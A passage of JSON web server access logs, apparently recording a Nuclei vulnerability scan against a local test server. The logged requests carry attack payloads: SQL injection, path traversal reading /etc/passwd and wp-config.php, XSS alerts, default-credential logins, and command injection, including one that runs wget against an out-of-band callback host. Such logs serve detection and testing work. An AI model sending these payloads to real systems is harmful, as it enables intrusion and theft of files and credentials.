HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /control/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/84 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forum/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"{\x22action\x22:\x22SSLVPN_Resource\x22,\x22method\x22:\x22deleteImage\x22,\x22data\x22:[{\x22data\x22:[\x22/var/www/html/d.txt;cat /etc/passwd >/var/www/html/poc.txt\x22]}],\x22type\x22:\x22rpc\x22,\x22tid\x22:17,\x22f8839p7rqtj\x22:\x22=\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /directdata/direct/router HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /counters HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"username={{username}}&password={{password}}&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /addons/phpmailer/phpmailer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/whoami HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /WEB_VMS/LEVEL15/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%80%B5example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ADSearch.cc?methodToCall=search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"userid=kevinlab&userpass=kevin003","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dashboard/proc.php?type=login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/85 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/dashboard?maxResults=100 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /flow/registries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /poc.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.125","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%82%9Dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/login/?next=/admin/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.082","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22vehicletitle\x22\x0D\x0A\x0D\x0ATest\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22brandname\x22\x0D\x0A\x0D\x0A1\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22vehicalorcview\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22priceperday\x22\x0D\x0A\x0D\x0A500\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22fueltype\x22\x0D\x0A\x0D\x0APetrol\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22modelyear\x22\x0D\x0A\x0D\x0A2022\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22seatingcapacity\x22\x0D\x0A\x0D\x0A5\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img1\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img2\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img3\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img4\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img5\x22; filename=\x22\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22submit\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/post-avehical.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.101","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.080","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/86 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system-diagnostics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cs/ContentServer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://ca2tuc8smpv1g2s80ca0jn5is7od4ju98.oast.pro)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.121","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/backend/auth/signin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /virtualems/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/nuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.089","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"{\x22query\x22:\x22query {\x5Cn nuclei1:__typename \x5Cn nuclei2:__typename \x5Cn nuclei3:__typename \x5Cn nuclei4:__typename \x5Cn nuclei5:__typename \x5Cn nuclei6:__typename \x5Cn }\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.086","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"amty_hidden=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%83%BCexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/87 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aims/ps/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 